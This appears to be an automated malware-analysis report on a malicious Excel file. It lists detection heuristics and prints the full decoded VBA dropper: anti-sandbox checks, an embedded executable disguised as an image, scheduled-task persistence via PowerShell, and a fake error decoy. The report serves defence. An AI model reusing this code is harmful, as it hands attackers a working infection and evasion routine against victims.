Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 90cc9ffc7ebec5ef…

MALICIOUS

Office (OOXML) / .XLSX

Size: 428.0 KB
Created: 2026-01-08 23:46:48 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2026-06-21
MD5: 67f742920329e7b10679b68121fcf1f4
SHA-1: 94bdbb0d2bbdc9c6233c001efb2bced80afccf75
SHA-256: 90cc9ffc7ebec5ef9988358604a88b7229fb7b8e6fb802e050274c65b087a07c
Risk score: 318

Heuristics (11)

  • VBA project inside OOXML (severity: medium; rule: OOXML_VBA; 7 related findings)
    Document contains a VBA project — VBA macros present
  • PowerShell reference in VBA (severity: critical; rule: OLE_VBA_PS)
    Matched line in script:
    ret = dvyfvuzwcy.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -File """ & tempPsFile & """", eycejkjhfr, True)
  • Obfuscated auto-exec VBA loader (severity: critical; rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
    Set wmi = GetObject(obirpbolbnuwqwt("77696e6d676d74733a5c5c2e5c726f6f745c63696d") & obirpbolbnuwqwt("7632"))
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    Matched line in script:
    CreateObject(obirpbolbnuwqwt("5368656c6c2e4170") & obirpbolbnuwqwt("706c69636174696f6e")) _
  • GetObject call (severity: high; rule: OLE_VBA_GETOBJ)
    Matched line in script:
    Set wmi = GetObject(obirpbolbnuwqwt("77696e6d676d74733a5c5c2e5c726f6f745c63696d") & obirpbolbnuwqwt("7632"))
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro (severity: low; rule: OLE_VBA_AUTO)
    Matched line in script:
    Sub Auto_Open()
  • Environ() call (env variable access) (severity: low; rule: OLE_VBA_ENVIRON)
    Matched line in script:
    feurxjazcfyb = Environ("TEMP") & "\update.log"
  • Embedded OLE object (severity: medium; rule: OOXML_OLE_OBJECT)
    Document contains an embedded OLE object
  • Macro/content-enable lure (severity: medium; rule: SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (6)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 17986 bytes
SHA-256: 1a80a91e2beabebd746c0064d840d4e0c918c695c51c6d59e38279ddff818531
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Const ivmhxzop = 2
Const otqmymogpnwrzdbjga = 1
Const eycejkjhfr = 0
Sub Auto_Open()
Dim feurxjazcfyb As String
feurxjazcfyb = Environ("TEMP") & "\update.log"
If Len(Dir(feurxjazcfyb)) > 0 Then
Call ckxvbaqbjuqszvcfvz
Exit Sub
End If
If ezwkjlogadppqhoauu() Then
Call ckxvbaqbjuqszvcfvz
Else
MsgBox obirpbolbnuwqwt("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420626520") & obirpbolbnuwqwt("6f70656e65642e"), vbCritical
Exit Sub
End If
End Sub
Function ezwkjlogadppqhoauu() As Boolean
Dim wmi As Object
Dim hklguusqvyrlualolso As Integer
Dim availableMemory As Double
Dim totalDiskSpace As Double
Dim systemDrive As String
Dim oqrzsquqflk As Object
Dim lcgrvlwfmfqc As Variant
lcgrvlwfmfqc = Array(obirpbolbnuwqwt("636973") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("636d64") & obirpbolbnuwqwt("76697274682e657865"), obirpbolbnuwqwt("616c697665") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("66696c657761746368657273657276696365") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("6e67766d7376") & obirpbolbnuwqwt("632e657865"), obirpbolbnuwqwt("73616e64626f78696572706373732e") & obirpbolbnuwqwt("657865"), _
obirpbolbnuwqwt("616e") & obirpbolbnuwqwt("616c797a65722e657865"), obirpbolbnuwqwt("666f7274697472616365") & obirpbolbnuwqwt("722e657865"), obirpbolbnuwqwt("6e7376657263746c") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("73626965") & obirpbolbnuwqwt("6374726c2e657865"), obirpbolbnuwqwt("616e67") & obirpbolbnuwqwt("6172322e657865"), obirpbolbnuwqwt("676f61746361737065722e") & obirpbolbnuwqwt("657865"), _
obirpbolbnuwqwt("6f6c6c796462672e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("7362") & obirpbolbnuwqwt("69657376632e657865"), obirpbolbnuwqwt("6170696d6f6e69746f72") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("476f6174436c69") & obirpbolbnuwqwt("656e744170702e657865"), obirpbolbnuwqwt("7065") & obirpbolbnuwqwt("69642e657865"), obirpbolbnuwqwt("7363") & obirpbolbnuwqwt("616e686f73742e657865"), _
obirpbolbnuwqwt("6170697370792e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("6869657733322e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("7065") & obirpbolbnuwqwt("726c2e657865"), obirpbolbnuwqwt("73636b") & obirpbolbnuwqwt("746f6f6c2e657865"), obirpbolbnuwqwt("61706973") & obirpbolbnuwqwt("707933322e657865"), obirpbolbnuwqwt("686f6f") & obirpbolbnuwqwt("6b616e616170702e657865"), obirpbolbnuwqwt("7065746f6f") & obirpbolbnuwqwt("6c732e657865"), _
obirpbolbnuwqwt("7364636c742e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("617375") & obirpbolbnuwqwt("72612e657865"), obirpbolbnuwqwt("686f6f6b65") & obirpbolbnuwqwt("78706c6f7265722e657865"), obirpbolbnuwqwt("706578") & obirpbolbnuwqwt("706c6f7265722e657865"), obirpbolbnuwqwt("7366") & obirpbolbnuwqwt("746463632e657865"), obirpbolbnuwqwt("6175746f7265706775692e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("68747470") & obirpbolbnuwqwt("6c6f672e657865"), _
obirpbolbnuwqwt("7069") & obirpbolbnuwqwt("6e672e657865"), obirpbolbnuwqwt("73687574646f776e6d") & obirpbolbnuwqwt("6f6e2e657865"), obirpbolbnuwqwt("617574") & obirpbolbnuwqwt("6f72756e732e657865"), obirpbolbnuwqwt("69636573") & obirpbolbnuwqwt("776f72642e657865"), obirpbolbnuwqwt("70723063") & obirpbolbnuwqwt("3378702e657865"), obirpbolbnuwqwt("736e6966666869742e65") & obirpbolbnuwqwt("7865"), _
obirpbolbnuwqwt("6175746f72756e73") & obirpbolbnuwqwt("632e657865"), obirpbolbnuwqwt("69636c6963") & obirpbolbnuwqwt("6b65722d72656c656173652e657865"), obirpbolbnuwqwt("707269") & obirpbolbnuwqwt("6e63652e657865"), obirpbolbnuwqwt("736e6f6f") & obirpbolbnuwqwt("702e657865"), obirpbolbnuwqwt("6175746f73637265656e73686f74746572") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("696461672e65") & obirpbolbnuwqwt("7865"), _
obirpbolbnuwqwt("70726f63616e616c797a") & obirpbolbnuwqwt("65722e657865"), obirpbolbnuwqwt("73706b726d6f6e") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("6176637465737473") & obirpbolbnuwqwt("756974652e657865"), obirpbolbnuwqwt("696461673634") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("70726f6365") & obirpbolbnuwqwt("73736861636b65722e657865"), obirpbolbnuwqwt("737973") & obirpbolbnuwqwt("616e616c797a65722e657865"), _
obirpbolbnuwqwt("6176") & obirpbolbnuwqwt("7a2e657865"), obirpbolbnuwqwt("696461") & obirpbolbnuwqwt("712e657865"), obirpbolbnuwqwt("70726f636573736d656d64756d702e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("7379736572") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("626568617669") & obirpbolbnuwqwt("6f7264756d7065722e657865"), obirpbolbnuwqwt("696d6d756e697479") & obirpbolbnuwqwt("64656275676765722e657865"), _
obirpbolbnuwqwt("70726f63657870") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("73797374656d6578") & obirpbolbnuwqwt("706c6f7265722e657865"), obirpbolbnuwqwt("62696e64696666") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("696d706f72747265") & obirpbolbnuwqwt("632e657865"), obirpbolbnuwqwt("70726f6365") & obirpbolbnuwqwt("787036342e657865"), obirpbolbnuwqwt("73797374") & obirpbolbnuwqwt("656d6578706c6f726572736572766963652e657865"), _
obirpbolbnuwqwt("4254505472617949636f6e") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("696d") & obirpbolbnuwqwt("756c2e657865"), obirpbolbnuwqwt("70726f636d6f6e2e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("737974686f6e2e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("636170747572656261742e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("496e666f63") & obirpbolbnuwqwt("6c69656e742e657865"), obirpbolbnuwqwt("70726f636d6f") & obirpbolbnuwqwt("6e36342e657865"), _
obirpbolbnuwqwt("7461736b6d6772") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("6364") & obirpbolbnuwqwt("622e657865"), obirpbolbnuwqwt("696e7374616c6c726974652e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("707974686f6e") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("7461736c6f6769") & obirpbolbnuwqwt("6e2e657865"), obirpbolbnuwqwt("6366") & obirpbolbnuwqwt("666578706c6f7265722e657865"), obirpbolbnuwqwt("697066732e65") & obirpbolbnuwqwt("7865"), _
obirpbolbnuwqwt("707974686f6e") & obirpbolbnuwqwt("772e657865"), obirpbolbnuwqwt("74637064") & obirpbolbnuwqwt("756d702e657865"), obirpbolbnuwqwt("636c69636b73686172656c") & obirpbolbnuwqwt("61756e636865722e657865"), obirpbolbnuwqwt("6970726f7365746d6f6e69") & obirpbolbnuwqwt("746f722e657865"), obirpbolbnuwqwt("71712e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("746370766965772e65") & obirpbolbnuwqwt("7865"), _
obirpbolbnuwqwt("636c6f") & obirpbolbnuwqwt("7365706f7075702e657865"), obirpbolbnuwqwt("69726167") & obirpbolbnuwqwt("656e742e657865"), obirpbolbnuwqwt("717166666f2e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("71717072") & obirpbolbnuwqwt("6f746563742e657865"), obirpbolbnuwqwt("746f74") & obirpbolbnuwqwt("616c636d642e657865"), obirpbolbnuwqwt("63706f727473") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("6a6f65") & obirpbolbnuwqwt("626f78636f6e74726f6c2e657865"), _
obirpbolbnuwqwt("71717367") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("74726f6a6469652e6b767063726f737366") & obirpbolbnuwqwt("6972652e657865"), obirpbolbnuwqwt("6a6f65626f") & obirpbolbnuwqwt("787365727665722e657865"), obirpbolbnuwqwt("726170746f72636c69") & obirpbolbnuwqwt("656e742e657865"), obirpbolbnuwqwt("7478") & obirpbolbnuwqwt("706c6174666f726d2e657865"), obirpbolbnuwqwt("646e662e65") & obirpbolbnuwqwt("7865"), _
obirpbolbnuwqwt("6c616d6572") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("7265676d6f6e") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("76697275732e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("64736e6966662e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("4c6f67485454") & obirpbolbnuwqwt("502e657865"), obirpbolbnuwqwt("72656773686f") & obirpbolbnuwqwt("742e657865"), obirpbolbnuwqwt("7678") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("64756d706361702e65") & obirpbolbnuwqwt("7865"), _
obirpbolbnuwqwt("6c6f7264") & obirpbolbnuwqwt("70652e657865"), obirpbolbnuwqwt("5265704d67723634") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("77696e616c79") & obirpbolbnuwqwt("7369732e657865"), obirpbolbnuwqwt("656d756c2e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("6d616c6d6f6e2e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("526570") & obirpbolbnuwqwt("5574696c7333322e657865"), obirpbolbnuwqwt("77696e6170696f7665727269646533322e") & obirpbolbnuwqwt("657865"), _
obirpbolbnuwqwt("657468657265") & obirpbolbnuwqwt("616c2e657865"), obirpbolbnuwqwt("6d62") & obirpbolbnuwqwt("6172756e2e657865"), obirpbolbnuwqwt("52657055782e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("77696e6462") & obirpbolbnuwqwt("672e657865"), obirpbolbnuwqwt("6574746572636170") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("6d64706d6f") & obirpbolbnuwqwt("6e2e657865"), obirpbolbnuwqwt("72756e") & obirpbolbnuwqwt("73616d706c652e657865"), _
obirpbolbnuwqwt("77696e64756d702e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("66616b65687474") & obirpbolbnuwqwt("707365727665722e657865"), obirpbolbnuwqwt("6d6d72") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("7361") & obirpbolbnuwqwt("6d7031652e657865"), obirpbolbnuwqwt("7769") & obirpbolbnuwqwt("6e7370792e657865"), obirpbolbnuwqwt("66616b6573") & obirpbolbnuwqwt("65727665722e657865"), obirpbolbnuwqwt("73616d") & obirpbolbnuwqwt("706c652e657865"), _
obirpbolbnuwqwt("776972657368") & obirpbolbnuwqwt("61726b2e657865"), obirpbolbnuwqwt("6c676875625f6167656e742e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("4465") & obirpbolbnuwqwt("6c6c4f7074696d697a65722e657865"), obirpbolbnuwqwt("466964646c") & obirpbolbnuwqwt("65722e657865"), obirpbolbnuwqwt("6d756c74") & obirpbolbnuwqwt("69706f742e657865"), obirpbolbnuwqwt("73616e64626f786965") & obirpbolbnuwqwt("63727970746f2e657865"), obirpbolbnuwqwt("5858582e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("66696c656d6f6e") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("6e6574736e") & obirpbolbnuwqwt("69666665722e657865"), _
obirpbolbnuwqwt("73616e64626f7869656463") & obirpbolbnuwqwt("6f6d6c61756e63682e657865"))
On Error Resume Next
Set wmi = GetObject(obirpbolbnuwqwt("77696e6d676d74733a5c5c2e5c726f6f745c63696d") & obirpbolbnuwqwt("7632"))
systemDrive = wmi.ExecQuery(obirpbolbnuwqwt("53656c6563742053797374656d4472697665") & obirpbolbnuwqwt("2066726f6d2057696e33325f4f7065726174696e6753797374656d")).ItemIndex(0).systemDrive
systemDrive = Left(systemDrive, ivmhxzop)
hklguusqvyrlualolso = wmi.ExecQuery(obirpbolbnuwqwt("53656c656374204e756d6265724f664c6f676963616c50726f636573736f7273") & obirpbolbnuwqwt("2066726f6d2057696e33325f436f6d707574657253797374656d")).ItemIndex(0).NumberOfLogicalProcessors
If hklguusqvyrlualolso < 2 Then
MsgBox obirpbolbnuwqwt("5468652066696c6520697320636f727275") & obirpbolbnuwqwt("7074656420616e642063616e6e6f74206265206f70656e65642e"), vbCritical
ezwkjlogadppqhoauu = False
Exit Function
End If
totalMemory = wmi.ExecQuery(obirpbolbnuwqwt("53656c65637420546f74616c50") & obirpbolbnuwqwt("6879736963616c4d656d6f72792066726f6d2057696e33325f436f6d707574657253797374656d")).ItemIndex(0).TotalPhysicalMemory / (1024 ^ 2)
If totalMemory < 2048 Then
MsgBox obirpbolbnuwqwt("5468652066696c6520697320636f7272757074656420616e") & obirpbolbnuwqwt("642063616e6e6f74206265206f70656e65642e"), vbCritical
ezwkjlogadppqhoauu = False
Exit Function
End If
Set oqrzsquqflk = wmi.ExecQuery(obirpbolbnuwqwt("53656c6563742053697a652066") & obirpbolbnuwqwt("726f6d2057696e33325f4c6f676963616c4469736b2077686572652044657669636549443d27") & systemDrive & obirpbolbnuwqwt("27")).ItemIndex(0)
totalDiskSpace = oqrzsquqflk.Size / (1024 ^ 3)
If totalDiskSpace < 40 Then
MsgBox obirpbolbnuwqwt("5468652066696c6520697320636f727275") & obirpbolbnuwqwt("7074656420616e642063616e6e6f74206265206f70656e65642e"), vbCritical
ezwkjlogadppqhoauu = False
Exit Function
End If
Dim hjinjwbapt, pf, hasPagefile
hasPagefile = False
Set hjinjwbapt = wmi.ExecQuery(obirpbolbnuwqwt("53656c656374202a2066726f6d2057696e33325f") & obirpbolbnuwqwt("5061676546696c655573616765"))
For Each pf In hjinjwbapt
If pf.AllocatedBaseSize > 0 Then
hasPagefile = True
Exit For
End If
Next
If Not hasPagefile Then
Set hjinjwbapt = wmi.ExecQuery(obirpbolbnuwqwt("53656c65637420") & obirpbolbnuwqwt("2a2066726f6d2057696e33325f5061676546696c6553657474696e67"))
For Each pf In hjinjwbapt
If pf.InitialSize > 0 Or pf.MaximumSize > 0 Then
hasPagefile = True
Exit For
End If
Next
End If
If Not hasPagefile Then
MsgBox obirpbolbnuwqwt("5468652066696c6520697320636f7272757074656420616e642063616e6e6f74206265206f") & obirpbolbnuwqwt("70656e65642e"), vbCritical
ezwkjlogadppqhoauu = False
Exit Function
End If
If etdqcxwznwkhkcjab(lcgrvlwfmfqc) Then
MsgBox obirpbolbnuwqwt("5468652066696c6520697320636f7272") & obirpbolbnuwqwt("757074656420616e642063616e6e6f74206265206f70656e65642e"), vbCritical
ezwkjlogadppqhoauu = False
Exit Function
End If
ezwkjlogadppqhoauu = True
End Function
Function etdqcxwznwkhkcjab(lcgrvlwfmfqc As Variant) As Boolean
Dim wmi As Object
Dim qikmyiu As Object
Dim ocpvunrgopfme As Object
Dim etyhovem As Integer
On Error Resume Next
Set wmi = GetObject(obirpbolbnuwqwt("77696e6d676d74733a5c5c2e5c726f6f745c6369") & obirpbolbnuwqwt("6d7632"))
Set qikmyiu = wmi.ExecQuery(obirpbolbnuwqwt("53656c") & obirpbolbnuwqwt("656374202a2066726f6d2057696e33325f50726f63657373"))
For Each ocpvunrgopfme In qikmyiu
For etyhovem = LBound(lcgrvlwfmfqc) To UBound(lcgrvlwfmfqc)
If LCase(ocpvunrgopfme.Name) = LCase(lcgrvlwfmfqc(etyhovem)) Then
etdqcxwznwkhkcjab = True
Exit Function
End If
Next etyhovem
Next ocpvunrgopfme
etdqcxwznwkhkcjab = False
End Function
Sub ckxvbaqbjuqszvcfvz()
Dim wsbggvik As String
Dim kzudnlzwvprgq As String
Dim brwpqchaoycwx As Object
Dim tcnkqfxaae As String
Dim tswkqwaxfwhlnasu As String
Dim yjlkpilcesxkob As String
Dim hqpoldzgoeks As String
Dim ocwipptbo As String
ActiveSheet.OLEObjects(obirpbolbnuwqwt("4f626a656374") & obirpbolbnuwqwt("2031")).Copy
CreateObject(obirpbolbnuwqwt("5368656c6c2e4170") & obirpbolbnuwqwt("706c69636174696f6e")) _
.Namespace(ActiveWorkbook.Path) _
.Self.InvokeVerb obirpbolbnuwqwt("5061") & obirpbolbnuwqwt("737465")
filePath = ActiveWorkbook.Path & obirpbolbnuwqwt("5c696d616765") & obirpbolbnuwqwt("2e6a7067")
appDataPath = CreateObject(obirpbolbnuwqwt("57536372697074") & obirpbolbnuwqwt("2e5368656c6c")).SpecialFolders(obirpbolbnuwqwt("417070") & obirpbolbnuwqwt("44617461"))
ocwipptbo = appDataPath & obirpbolbnuwqwt("5c4d") & obirpbolbnuwqwt("534f66666963655c")
If Dir(ocwipptbo, vbDirectory) = "" Then
MkDir ocwipptbo
Else
Kill filePath
Exit Sub
End If
yjlkpilcesxkob = ocwipptbo & obirpbolbnuwqwt("6d7373757362") & obirpbolbnuwqwt("2e657865") '
FileCopy filePath, yjlkpilcesxkob
Set brwpqchaoycwx = CreateObject(obirpbolbnuwqwt("575363726970742e") & obirpbolbnuwqwt("5368656c6c"))
wsbggvik = obirpbolbnuwqwt("5570646174655461736b4d61") & obirpbolbnuwqwt("6368696e65")
hqpoldzgoeks = obirpbolbnuwqwt("737461") & obirpbolbnuwqwt("7274")
tempPsFile = Environ("TEMP") & "\CreateTask_" & Format(Now, "yyyymmdd_hhnnss") & "_" & Int((10000) * Rnd) & ".ps1"
psCommand = obirpbolbnuwqwt("696620282d4e6f7420284765742d53") & obirpbolbnuwqwt("63686564756c65645461736b202d5461736b4e616d652027") & wsbggvik & obirpbolbnuwqwt("27202d4572726f72416374696f6e2053696c656e746c79436f6e74696e7565") & obirpbolbnuwqwt("2929207b") & vbCrLf & _
obirpbolbnuwqwt("2020202024737461727454696d65203d20284765742d44617465292e4164644d696e757465732832") & obirpbolbnuwqwt("39292e546f537472696e67282748483a6d6d2729") & vbCrLf & _
obirpbolbnuwqwt("2020202024616374696f6e203d204e65772d5363686564756c65645461736b416374696f6e202d45") & obirpbolbnuwqwt("7865637574652027") & yjlkpilcesxkob & obirpbolbnuwqwt("27202d417267756d656e74") & obirpbolbnuwqwt("2027") & hqpoldzgoeks & obirpbolbnuwqwt("27202d576f") & obirpbolbnuwqwt("726b696e674469726563746f72792027") & ocwipptbo & obirpbolbnuwqwt("27") & vbCrLf & _
obirpbolbnuwqwt("202020202474726967") & obirpbolbnuwqwt("676572203d204e65772d5363686564756c65645461736b54726967676572202d4461696c79202d41742024737461727454696d65") & vbCrLf & _
obirpbolbnuwqwt("2020202052656769737465722d5363686564756c65645461736b202d5461736b4e616d") & obirpbolbnuwqwt("652027") & wsbggvik & obirpbolbnuwqwt("27202d416374696f6e2024616374696f6e202d5472") & obirpbolbnuwqwt("6967676572202474726967676572202d466f726365") & vbCrLf & _
obirpbolbnuwqwt("7d")
Dim hcilhwqdsq As Object, qgobpqrvuqfrzpta As Object
Set hcilhwqdsq = CreateObject(obirpbolbnuwqwt("5363726970") & obirpbolbnuwqwt("74696e672e46696c6553797374656d4f626a656374"))
Set qgobpqrvuqfrzpta = hcilhwqdsq.CreateTextFile(tempPsFile, True, True)
qgobpqrvuqfrzpta.Write psCommand
qgobpqrvuqfrzpta.Close
Set dvyfvuzwcy = CreateObject(obirpbolbnuwqwt("5753") & obirpbolbnuwqwt("63726970742e5368656c6c"))
ret = dvyfvuzwcy.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -File """ & tempPsFile & """", eycejkjhfr, True)
On Error Resume Next
hcilhwqdsq.DeleteFile tempPsFile, True
On Error GoTo 0
Kill filePath
MsgBox obirpbolbnuwqwt("5468652066696c65") & obirpbolbnuwqwt("20697320636f7272757074656420616e642063616e6e6f74206265206f70656e65642e2e2e"), vbCritical
End Sub

Attribute VB_Name = "Module2"
Function obirpbolbnuwqwt(ByVal rrgefcwyo As String) As String
Dim meixyemazt As Long
For meixyemazt = 1 To Len(rrgefcwyo) Step 2
obirpbolbnuwqwt = obirpbolbnuwqwt & Chr$(Val("&H" & Mid$(rrgefcwyo, meixyemazt, 2)))
Next meixyemazt
End Function
ooxml_oleobject_00.bin | ooxml-ole-object | OOXML embedded OLE part: xl/embeddings/oleObject1.bin | 712192 bytes
SHA-256: 946f6e3740b6ef6b1b60d6846106d3c344004dfc6f4449de20e4aceb81c5f3c5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.52, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00.bin | ole-package | OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native | 705064 bytes
SHA-256: 469a118471823de22f32b701d2905c009363f301d64c4bc2b44de5fc039703bf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00_image.jpg | ole-package-payload | OOXML xl/embeddings/oleObject1.bin Ole10Native payload: display_name=image.jpg; full_path=C:\Users\Admin\AppData\Local\Temp\{32BE8721-87BE-47B5-92DC-D829BA01C4E7}\image.jpg; temp_path=; def_file= | 704512 bytes
SHA-256: 3a6c25a26bee9a24c83b670feae67118fc7ec15ab4786aaf6a9a77df6aa8f71a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 38400 bytes
SHA-256: b4af8305c5e9da8629f52d1872854d73aa4e5a4b4b29dc9510e09b2ea12a365a
emf_00.emf | ooxml-emf | OOXML EMF part: xl/media/image1.emf | 4988 bytes
SHA-256: 47b36d4917a574120d2728674abc24e9796871c1fc19eca067ce81eca3058888